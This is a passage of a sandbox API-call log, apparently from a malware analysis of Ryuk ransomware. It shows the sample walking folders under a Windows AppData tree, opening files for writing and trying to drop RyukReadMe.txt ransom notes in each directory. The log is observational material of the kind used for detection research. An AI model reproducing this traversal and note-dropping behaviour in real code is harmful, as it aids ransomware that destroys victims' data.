| out: lpFindFileData=0x29aa420) returned 1 [0159.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.918] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl", dwFileAttributes=0x80) returned 0 [0159.919] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.919] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.920] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.920] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl", dwFileAttributes=0x80) returned 0 [0159.920] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.920] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.920] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0159.920] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0159.921] SetLastError (dwErrCode=0x0) [0159.921] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.925] GetLastError () returned 0x5 [0159.925] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.925] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0159.925] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.925] SetLastError (dwErrCode=0x0) [0159.925] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.925] GetLastError () returned 0x5 [0159.925] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.925] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.925] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.925] SetLastError (dwErrCode=0x0) [0159.925] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.926] GetLastError () returned 0x5 [0159.926] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.926] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.926] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.926] SetLastError (dwErrCode=0x0) [0159.926] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.926] GetLastError () returned 0x5 [0159.926] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.926] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.926] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.926] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.926] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.926] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.926] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.926] SetLastError (dwErrCode=0x0) [0159.926] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.926] GetLastError () returned 0x5 [0159.927] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.927] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.927] SetLastError (dwErrCode=0x0) [0159.927] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.927] GetLastError () returned 0x5 [0159.927] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.927] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.927] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.927] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.928] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", dwFileAttributes=0x80) returned 0 [0159.928] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.929] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.929] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.929] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.929] SetLastError (dwErrCode=0x0) [0159.929] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.929] GetLastError () returned 0x5 [0159.929] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.929] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.929] SetLastError (dwErrCode=0x0) [0159.929] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.929] GetLastError () returned 0x5 [0159.929] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.929] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.930] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.930] SetLastError (dwErrCode=0x0) [0159.930] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\temporary internet files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.934] GetLastError () returned 0x5 [0159.935] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.935] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.935] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.935] SetLastError (dwErrCode=0x0) [0159.935] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.935] GetLastError () returned 0x5 [0159.935] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.935] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.935] SetLastError (dwErrCode=0x0) [0159.935] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.935] GetLastError () returned 0x5 [0159.935] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.935] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.936] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.936] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.936] SetLastError (dwErrCode=0x0) [0159.936] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.936] GetLastError () returned 0x5 [0159.936] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.936] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.936] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.936] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.936] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.936] SetLastError (dwErrCode=0x0) [0159.936] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.936] GetLastError () returned 0x5 [0159.937] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.937] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.937] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.937] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.937] SetLastError (dwErrCode=0x0) [0159.937] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.937] GetLastError () returned 0x5 [0159.937] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.937] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.938] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.938] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.938] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", dwFileAttributes=0x80) returned 0 [0159.939] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.939] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.939] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.939] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015", dwFileAttributes=0x80) returned 0 [0159.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.940] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.940] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.940] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.940] SetLastError (dwErrCode=0x0) [0159.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.940] GetLastError () returned 0x5 [0159.940] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.940] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.940] SetLastError (dwErrCode=0x0) [0159.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.941] GetLastError () returned 0x5 [0159.941] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.941] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.941] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.941] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.941] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.941] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", dwFileAttributes=0x80) returned 0 [0159.942] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.942] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.943] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.943] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015", dwFileAttributes=0x80) returned 0 [0159.943] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.943] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.943] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.943] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.943] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.944] SetLastError (dwErrCode=0x0) [0159.944] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.944] GetLastError () returned 0x5 [0159.944] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.944] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.944] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.944] SetLastError (dwErrCode=0x0) [0159.944] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.944] GetLastError () returned 0x5 [0159.944] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.944] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.944] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.944] SetLastError (dwErrCode=0x0) [0159.944] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 